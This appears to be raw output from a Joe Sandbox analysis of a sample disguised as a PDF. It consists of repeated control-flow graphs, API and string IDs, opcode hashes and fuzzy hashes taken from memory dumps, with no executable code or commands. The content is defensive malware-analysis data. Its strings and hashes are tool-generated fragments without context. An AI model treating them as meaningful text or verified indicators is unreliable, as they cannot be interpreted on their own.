                                                                                                                                                                                control_flow_graph 262 761d128-761d18d 263 761d193-761d1a0 262->263 264 761d675-761d6de 262->264 267 761d6e5-761d73c 263->267 268 761d1a6-761d1b0 263->268 264->267 272 761d743-761d79a 267->272 268->272 273 761d1b6-761d1c0 268->273 275 761d7a1-761d7f8 272->275 273->275 276 761d1c6-761d1d0 273->276 280 761d7ff-761d85c 275->280 279 761d1d6-761d1dd 276->279 276->280 289 761d863-761d8d1 279->289 290 761d1e3-761d1e7 279->290 280->289 347 761d8d3-761d8d7 289->347 348 761d8d9-761d8db 289->348 294 761d1e9-761d21e 290->294 295 761d23e-761d292 call 761b764 call 761b774 GetCapture 290->295 294->295 316 761d220-761d22f 294->316 319 761d294-761d29a 295->319 320 761d29b-761d2a9 295->320 316->295 332 761d231-761d23b call 761b754 316->332 319->320 321 761d2d5-761d30a GetActiveWindow 320->321 322 761d2ab-761d2d0 call 761959c 320->322 327 761d313-761d324 321->327 328 761d30c-761d312 321->328 322->321 335 761d333 327->335 336 761d326-761d331 327->336 328->327 332->295 342 761d336-761d368 335->342 336->342 354 761d36a-761d370 342->354 355 761d37d-761d3a0 342->355 350 761d8e0-761d8ee 347->350 348->350 354->355 356 761d372-761d378 call 761b784 354->356 360 761d3a6-761d3b0 355->360 361 761d468-761d472 355->361 356->355 360->361 366 761d3b6-761d3e9 360->366 362 761d474-761d477 call 761d940 361->362 363 761d47d-761d4a0 361->363 362->363 369 761d4a2-761d4a5 363->369 370 761d4a8-761d4b6 363->370 373 761d5bb-761d64b call 761b784 366->373 374 761d3ef-761d45e 366->374 369->370 375 761d4b8-761d4c6 370->375 376 761d4ec-761d4fa 370->376 373->264 374->361 375->376 383 761d4c8-761d4ea 375->383 381 761d518-761d51f 376->381 382 761d4fc-761d50a 376->382 417 761d525 call 8a51cc1 381->417 418 761d525 call 8a51cd0 381->418 382->381 389 761d50c-761d512 382->389 383->381 387 761d528-761d538 394 761d53a-761d544 387->394 395 761d58d-761d59c 387->395 389->381 399 761d582-761d587 394->399 400 761d546-761d559 call 761b794 394->400 395->373 399->395 400->399 407 761d55b-761d57d call 761b7a4 400->407 407->399 417->387 418->387
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ActiveCaptureWindow
                                                                                                                                                                                • String ID: Hbq$Hbq
                                                                                                                                                                                • API String ID: 2424615356-4258043069
                                                                                                                                                                                • Opcode ID: e39a3c4bae11ae0279f65c786a4cdce0cad6b46bddf0ed6eb938906ad6837b0b
                                                                                                                                                                                • Instruction ID: 4c5c34da9558b4b810721d50332606dfb142945e108c64b04d26e26aa9890c91
                                                                                                                                                                                • Opcode Fuzzy Hash: e39a3c4bae11ae0279f65c786a4cdce0cad6b46bddf0ed6eb938906ad6837b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: C82252B0B002099FEB14DBB9C5546AEBBF6AF88300F288169D509EB395DF349D46CB51

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 527 1d2c146-1d2c158 528 1d2c184 527->528 529 1d2c15a-1d2c172 527->529 530 1d2c186-1d2c18a 528->530 533 1d2c174-1d2c179 529->533 534 1d2c17b-1d2c17e 529->534 533->530 535 1d2c180-1d2c182 534->535 536 1d2c18b-1d2c199 534->536 535->528 535->529 538 1d2c1a0-1d2c1a1 536->538 539 1d2c19b-1d2c19d 536->539 542 1d2c1a3 538->542 543 1d2c1a8-1d2c1c8 538->543 540 1d2c1a4-1d2c1a7 539->540 541 1d2c19f 539->541 540->543 541->538 542->540 544 1d2c1ca 543->544 545 1d2c1cf-1d2c2ac call 1d241a0 call 1d23cc0 543->545 544->545 555 1d2c2b3-1d2c2d4 call 1d25658 545->555 556 1d2c2ae 545->556 558 1d2c2d9-1d2c2e4 555->558 556->555 559 1d2c2e6 558->559 560 1d2c2eb-1d2c2ef 558->560 559->560 561 1d2c2f1-1d2c2f2 560->561 562 1d2c2f4-1d2c2fb 560->562 563 1d2c313-1d2c357 561->563 564 1d2c302-1d2c310 562->564 565 1d2c2fd 562->565 569 1d2c3bd-1d2c3d4 563->569 564->563 565->564 571 1d2c3d6-1d2c3fb 569->571 572 1d2c359-1d2c36f 569->572 578 1d2c413 571->578 579 1d2c3fd-1d2c412 571->579 576 1d2c371-1d2c37d 572->576 577 1d2c399 572->577 580 1d2c387-1d2c38d 576->580 581 1d2c37f-1d2c385 576->581 582 1d2c39f-1d2c3bc 577->582 579->578 583 1d2c397 580->583 581->583 582->569 583->582
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 5ca502181bde76b1adb382a71a209c87d0b2307ab89707b9ec64956a57ca0f2e
                                                                                                                                                                                • Instruction ID: 2e9248805a02b99141f7b18f967b1a9b32e86534d5e7eaa1cb89b8a8ef6770c6
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ca502181bde76b1adb382a71a209c87d0b2307ab89707b9ec64956a57ca0f2e
                                                                                                                                                                                • Instruction Fuzzy Hash: 2AA1E374E10218DFDB14CFAAD884A9DBBF2BF99314F14806AE819AB365DB319D41CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 587 1d2c468-1d2c471 588 1d2c473-1d2c477 587->588 589 1d2c478-1d2c498 587->589 588->589 590 1d2c49a 589->590 591 1d2c49f-1d2c57c call 1d241a0 call 1d23cc0 589->591 590->591 601 1d2c583-1d2c5a4 call 1d25658 591->601 602 1d2c57e 591->602 604 1d2c5a9-1d2c5b4 601->604 602->601 605 1d2c5b6 604->605 606 1d2c5bb-1d2c5bf 604->606 605->606 607 1d2c5c1-1d2c5c2 606->607 608 1d2c5c4-1d2c5cb 606->608 609 1d2c5e3-1d2c627 607->609 610 1d2c5d2-1d2c5e0 608->610 611 1d2c5cd 608->611 615 1d2c68d-1d2c6a4 609->615 610->609 611->610 617 1d2c6a6-1d2c6cb 615->617 618 1d2c629-1d2c63f 615->618 624 1d2c6e3 617->624 625 1d2c6cd-1d2c6e2 617->625 622 1d2c641-1d2c64d 618->622 623 1d2c669 618->623 626 1d2c657-1d2c65d 622->626 627 1d2c64f-1d2c655 622->627 628 1d2c66f-1d2c68c 623->628 625->624 629 1d2c667 626->629 627->629 628->615 629->628
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: d68d05f8aa8479e41454bd547b2fbb4a67aa1e92314e25227087987034b6172f
                                                                                                                                                                                • Instruction ID: 512bea994ccf120031f90905b51f84fd062a9869410f23016b640bf857271c99
                                                                                                                                                                                • Opcode Fuzzy Hash: d68d05f8aa8479e41454bd547b2fbb4a67aa1e92314e25227087987034b6172f
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D81B274E10218CFDB14DFAAD884A9DBBF2BF98304F149069E819AB365DB34AD41CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 633 1d25370-1d253a0 634 1d253a2 633->634 635 1d253a7-1d25484 call 1d241a0 call 1d23cc0 633->635 634->635 645 1d25486 635->645 646 1d2548b-1d254a9 635->646 645->646 676 1d254ac call 1d25658 646->676 677 1d254ac call 1d25649 646->677 647 1d254b2-1d254bd 648 1d254c4-1d254c8 647->648 649 1d254bf 647->649 650 1d254ca-1d254cb 648->650 651 1d254cd-1d254d4 648->651 649->648 652 1d254ec-1d25530 650->652 653 1d254d6 651->653 654 1d254db-1d254e9 651->654 658 1d25596-1d255ad 652->658 653->654 654->652 660 1d25532-1d25548 658->660 661 1d255af-1d255d4 658->661 665 1d25572 660->665 666 1d2554a-1d25556 660->666 667 1d255d6-1d255eb 661->667 668 1d255ec 661->668 671 1d25578-1d25595 665->671 669 1d25560-1d25566 666->669 670 1d25558-1d2555e 666->670 667->668 672 1d25570 669->672 670->672 671->658 672->671 676->647 677->647
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 7716d9adb4f1f590ea03da59d2165271ed794bb28bc488641e96b364dce1bcd5
                                                                                                                                                                                • Instruction ID: a5fd23d04df8bee1a585cd3fec4532fe5f9a5e04ccd1eb634bf5ad0f80877048
                                                                                                                                                                                • Opcode Fuzzy Hash: 7716d9adb4f1f590ea03da59d2165271ed794bb28bc488641e96b364dce1bcd5
                                                                                                                                                                                • Instruction Fuzzy Hash: 8581A474E00218DFDB14DFAAD984A9DBBF2BF88304F14D069E819AB365DB349945CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 810 1d2d278-1d2d2a8 811 1d2d2aa 810->811 812 1d2d2af-1d2d38c call 1d241a0 call 1d23cc0 810->812 811->812 822 1d2d393-1d2d3b4 call 1d25658 812->822 823 1d2d38e 812->823 825 1d2d3b9-1d2d3c4 822->825 823->822 826 1d2d3c6 825->826 827 1d2d3cb-1d2d3cf 825->827 826->827 828 1d2d3d1-1d2d3d2 827->828 829 1d2d3d4-1d2d3db 827->829 830 1d2d3f3-1d2d437 828->830 831 1d2d3e2-1d2d3f0 829->831 832 1d2d3dd 829->832 836 1d2d49d-1d2d4b4 830->836 831->830 832->831 838 1d2d4b6-1d2d4db 836->838 839 1d2d439-1d2d44f 836->839 845 1d2d4f3 838->845 846 1d2d4dd-1d2d4f2 838->846 843 1d2d451-1d2d45d 839->843 844 1d2d479 839->844 847 1d2d467-1d2d46d 843->847 848 1d2d45f-1d2d465 843->848 849 1d2d47f-1d2d49c 844->849 846->845 850 1d2d477 847->850 848->850 849->836 850->849
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 970245738052f1692d9fb30f1be10161feadd86722553c561c42a06af4bc5833
                                                                                                                                                                                • Instruction ID: f8db676cc8d22ad5ce65eecd5067e6189e579e53c6be6b50cea616f594e59f08
                                                                                                                                                                                • Opcode Fuzzy Hash: 970245738052f1692d9fb30f1be10161feadd86722553c561c42a06af4bc5833
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A81C474E00618CFDB14DFAAD884A9DBBF2BF98304F14D069E819AB365DB349985CF10

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 678 1d2ca08-1d2ca38 679 1d2ca3a 678->679 680 1d2ca3f-1d2cb1c call 1d241a0 call 1d23cc0 678->680 679->680 690 1d2cb23-1d2cb44 call 1d25658 680->690 691 1d2cb1e 680->691 693 1d2cb49-1d2cb54 690->693 691->690 694 1d2cb56 693->694 695 1d2cb5b-1d2cb5f 693->695 694->695 696 1d2cb61-1d2cb62 695->696 697 1d2cb64-1d2cb6b 695->697 698 1d2cb83-1d2cbc7 696->698 699 1d2cb72-1d2cb80 697->699 700 1d2cb6d 697->700 704 1d2cc2d-1d2cc44 698->704 699->698 700->699 706 1d2cc46-1d2cc6b 704->706 707 1d2cbc9-1d2cbdf 704->707 713 1d2cc83 706->713 714 1d2cc6d-1d2cc82 706->714 711 1d2cbe1-1d2cbed 707->711 712 1d2cc09 707->712 715 1d2cbf7-1d2cbfd 711->715 716 1d2cbef-1d2cbf5 711->716 717 1d2cc0f-1d2cc2c 712->717 714->713 718 1d2cc07 715->718 716->718 717->704 718->717
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 354ff2cbcc005bd0aaafd706ad100159b20ad96756df77844b033cd8adcd4eeb
                                                                                                                                                                                • Instruction ID: b16a8f70dc08379c5d846a5e3961a39dde960522a8e72dbb535fdd15ead5a695
                                                                                                                                                                                • Opcode Fuzzy Hash: 354ff2cbcc005bd0aaafd706ad100159b20ad96756df77844b033cd8adcd4eeb
                                                                                                                                                                                • Instruction Fuzzy Hash: B481A074E00218CFDB14DFAAD884A9DBBF2BF98304F148069E819AB365DB349D85CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 722 1d2ccd8-1d2cd08 723 1d2cd0a 722->723 724 1d2cd0f-1d2cdec call 1d241a0 call 1d23cc0 722->724 723->724 734 1d2cdf3-1d2ce14 call 1d25658 724->734 735 1d2cdee 724->735 737 1d2ce19-1d2ce24 734->737 735->734 738 1d2ce26 737->738 739 1d2ce2b-1d2ce2f 737->739 738->739 740 1d2ce31-1d2ce32 739->740 741 1d2ce34-1d2ce3b 739->741 742 1d2ce53-1d2ce97 740->742 743 1d2ce42-1d2ce50 741->743 744 1d2ce3d 741->744 748 1d2cefd-1d2cf14 742->748 743->742 744->743 750 1d2cf16-1d2cf3b 748->750 751 1d2ce99-1d2ceaf 748->751 757 1d2cf53 750->757 758 1d2cf3d-1d2cf52 750->758 755 1d2ceb1-1d2cebd 751->755 756 1d2ced9 751->756 759 1d2cec7-1d2cecd 755->759 760 1d2cebf-1d2cec5 755->760 761 1d2cedf-1d2cefc 756->761 758->757 762 1d2ced7 759->762 760->762 761->748 762->761
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 6602e590140251d97f730e329da579bf9dbc03dc17e7ddd75299be5e08b8eb1e
                                                                                                                                                                                • Instruction ID: c2c3b5d62faa9bf05838064c1d532e4b1fd777d0ae0450979d678b10a14f6b3b
                                                                                                                                                                                • Opcode Fuzzy Hash: 6602e590140251d97f730e329da579bf9dbc03dc17e7ddd75299be5e08b8eb1e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E81B074E00218DFDB14DFAAD984A9DBBF2BF98304F14C069E819AB265DB349D85CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 766 1d2cfaa-1d2cfd8 767 1d2cfda 766->767 768 1d2cfdf-1d2d0bc call 1d241a0 call 1d23cc0 766->768 767->768 778 1d2d0c3-1d2d0e4 call 1d25658 768->778 779 1d2d0be 768->779 781 1d2d0e9-1d2d0f4 778->781 779->778 782 1d2d0f6 781->782 783 1d2d0fb-1d2d0ff 781->783 782->783 784 1d2d101-1d2d102 783->784 785 1d2d104-1d2d10b 783->785 786 1d2d123-1d2d167 784->786 787 1d2d112-1d2d120 785->787 788 1d2d10d 785->788 792 1d2d1cd-1d2d1e4 786->792 787->786 788->787 794 1d2d1e6-1d2d20b 792->794 795 1d2d169-1d2d17f 792->795 801 1d2d223 794->801 802 1d2d20d-1d2d222 794->802 799 1d2d181-1d2d18d 795->799 800 1d2d1a9 795->800 803 1d2d197-1d2d19d 799->803 804 1d2d18f-1d2d195 799->804 805 1d2d1af-1d2d1cc 800->805 802->801 806 1d2d1a7 803->806 804->806 805->792 806->805
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 6d9345104e806855c0f023bd4d54076ed68eca48e91d26dc5060a2cd2f498879
                                                                                                                                                                                • Instruction ID: 1cb6102a76a71af0601d905c837cc58e2e8b7bd46de1b19dd8daea7cf1218614
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d9345104e806855c0f023bd4d54076ed68eca48e91d26dc5060a2cd2f498879
                                                                                                                                                                                • Instruction Fuzzy Hash: FD81D674E00618CFDB14DFAAD984A9DBBF2BF98304F14C169E819AB365DB349981CF10

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 854 1d2c738-1d2c768 855 1d2c76a 854->855 856 1d2c76f-1d2c84c call 1d241a0 call 1d23cc0 854->856 855->856 866 1d2c853-1d2c874 call 1d25658 856->866 867 1d2c84e 856->867 869 1d2c879-1d2c884 866->869 867->866 870 1d2c886 869->870 871 1d2c88b-1d2c88f 869->871 870->871 872 1d2c891-1d2c892 871->872 873 1d2c894-1d2c89b 871->873 876 1d2c8b3-1d2c8f7 872->876 874 1d2c8a2-1d2c8b0 873->874 875 1d2c89d 873->875 874->876 875->874 880 1d2c95d-1d2c974 876->880 882 1d2c976-1d2c99b 880->882 883 1d2c8f9-1d2c90f 880->883 890 1d2c9b3 882->890 891 1d2c99d-1d2c9b2 882->891 887 1d2c911-1d2c91d 883->887 888 1d2c939 883->888 892 1d2c927-1d2c92d 887->892 893 1d2c91f-1d2c925 887->893 889 1d2c93f-1d2c95c 888->889 889->880 891->890 894 1d2c937 892->894 893->894 894->889
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 7b6fdefe2521ef95d2f4a0dc50663aed11aeb045a2c03fb0c7afbc52b49446e1
                                                                                                                                                                                • Instruction ID: 81dd87364e53c333bc632192eabc35bc551917abf2f610d6fca41cf997879967
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b6fdefe2521ef95d2f4a0dc50663aed11aeb045a2c03fb0c7afbc52b49446e1
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D81AF74E00218CFDB14DFAAD984A9DBBF2BF88304F14C069E819AB265DB749985CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 947 1d229ec-1d229f6 949 1d22981-1d22999 947->949 950 1d229f8-1d22a3b 947->950 954 1d229a0-1d229c8 949->954 955 1d22a5d-1d22aac 950->955 956 1d22a3d-1d22a5c 950->956 961 1d22ac7-1d22acf 955->961 962 1d22aae-1d22ab5 955->962 965 1d22ad2-1d22ae6 961->965 963 1d22ab7-1d22abc 962->963 964 1d22abe-1d22ac5 962->964 963->965 964->965 968 1d22ae8-1d22aef 965->968 969 1d22afc-1d22b04 965->969 970 1d22af1-1d22af3 968->970 971 1d22af5-1d22afa 968->971 972 1d22b06-1d22b0a 969->972 970->972 971->972 974 1d22b6a-1d22b6d 972->974 975 1d22b0c-1d22b21 972->975 976 1d22bb5-1d22bbb 974->976 977 1d22b6f-1d22b84 974->977 975->974 982 1d22b23-1d22b26 975->982 979 1d22bc1-1d22bc3 976->979 980 1d236b6 976->980 977->976 984 1d22b86-1d22b8a 977->984 979->980 983 1d22bc9-1d22bce 979->983 987 1d236bb-1d23700 980->987 985 1d22b45-1d22b63 call 1d202c8 982->985 986 1d22b28-1d22b2a 982->986 988 1d23664-1d23668 983->988 989 1d22bd4 983->989 990 1d22b92-1d22bb0 call 1d202c8 984->990 991 1d22b8c-1d22b90 984->991 985->974 986->985 992 1d22b2c-1d22b2f 986->992 1007 1d23702-1d23728 987->1007 1008 1d2372e-1d23874 987->1008 994 1d2366a-1d2366d 988->994 995 1d2366f-1d236b5 988->995 989->988 990->976 991->976 991->990 992->974 997 1d22b31-1d22b43 992->997 994->987 994->995 997->974 997->985 1007->1008 1009 1d238a6-1d238a9 1008->1009 1010 1d23876-1d23878 1008->1010 1012 1d238aa-1d238bc 1009->1012 1010->1012 1013 1d2387a-1d238a3 1010->1013 1015 1d238ee-1d238f4 1012->1015 1016 1d238be-1d238eb 1012->1016 1013->1009 1018 1d238f6-1d23908 1015->1018 1019 1d23928-1d23937 1015->1019 1016->1015 1020 1d2393a-1d2393d 1018->1020 1022 1d2390a-1d2390c 1018->1022 1019->1020 1023 1d2393e-1d23941 1020->1023 1022->1023 1024 1d2390e-1d23910 1022->1024 1025 1d23942-1d239e8 1023->1025 1024->1025 1026 1d23912-1d23927 1024->1026 1026->1019
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                                • API String ID: 0-2732225958
                                                                                                                                                                                • Opcode ID: 97254b771935a4786adbdbb5a1c9b708396793f78f469d90365fc98c583ce5a5
                                                                                                                                                                                • Instruction ID: 072afdc77e04ca8c932e5373f1e3c6524856c2dc22f67f970fa76b9ce5048a0c
                                                                                                                                                                                • Opcode Fuzzy Hash: 97254b771935a4786adbdbb5a1c9b708396793f78f469d90365fc98c583ce5a5
                                                                                                                                                                                • Instruction Fuzzy Hash: 71F10D31A063D4CBEF639F3884905ABBF71BF57218F5948EDE45097925C639480ECB92
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                                                • API String ID: 0-879173519
                                                                                                                                                                                • Opcode ID: 50418bc5087c97753e3e84f13a3be86a5f391c9405fc7e53294379da224740af
                                                                                                                                                                                • Instruction ID: 37686d4611157bd651bd52afdc171ac79e88505bf0bffe36ef9ba9577ae2dbf4
                                                                                                                                                                                • Opcode Fuzzy Hash: 50418bc5087c97753e3e84f13a3be86a5f391c9405fc7e53294379da224740af
                                                                                                                                                                                • Instruction Fuzzy Hash: 90027230A00229DFDB25CF69C884AAEBBF6FF68308F158465E865A7261D734ED41CF51
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$4'^q
                                                                                                                                                                                • API String ID: 0-273632683
                                                                                                                                                                                • Opcode ID: c05c02c589eee08293de346ed3235c5854552964b03ef586391befbee8f0e887
                                                                                                                                                                                • Instruction ID: 41952db4f07e6649f2c240329ce79bfb0e94d09ef5e9766777b1cfba1d8e3ec1
                                                                                                                                                                                • Opcode Fuzzy Hash: c05c02c589eee08293de346ed3235c5854552964b03ef586391befbee8f0e887
                                                                                                                                                                                • Instruction Fuzzy Hash: 71829E71A00219CFCB15CFA8C984AAEBBF2FF98308F158559E5259B662D734ED41CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ActiveCaptureWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2424615356-0
                                                                                                                                                                                • Opcode ID: 45ea41b913703eb2003e318494b6e62cd78c19e243041caa08e28fc683167d02
                                                                                                                                                                                • Instruction ID: 96eef9b25a5c43ae0da7b75014128768d2c50aa6ed888580d97a501fc0ea6984
                                                                                                                                                                                • Opcode Fuzzy Hash: 45ea41b913703eb2003e318494b6e62cd78c19e243041caa08e28fc683167d02
                                                                                                                                                                                • Instruction Fuzzy Hash: 25D110B4E00209DFEB25DFB9C588A9DBBF1BF89304F248169D509AB365DB709985CF10
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$Hbq
                                                                                                                                                                                • API String ID: 0-662517225
                                                                                                                                                                                • Opcode ID: d17acf39b8946b7cd171dc615d222cecaa8f939e017811ca36e951d983039b6d
                                                                                                                                                                                • Instruction ID: 987f1d23f969cfa583b98382b0a7452730360466f6576cd0302428f00bfc69ee
                                                                                                                                                                                • Opcode Fuzzy Hash: d17acf39b8946b7cd171dc615d222cecaa8f939e017811ca36e951d983039b6d
                                                                                                                                                                                • Instruction Fuzzy Hash: ED12AC70A002298FCB15DF69C894AAEBBF6FF98304F148569E915DB391DB34DD41CB90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
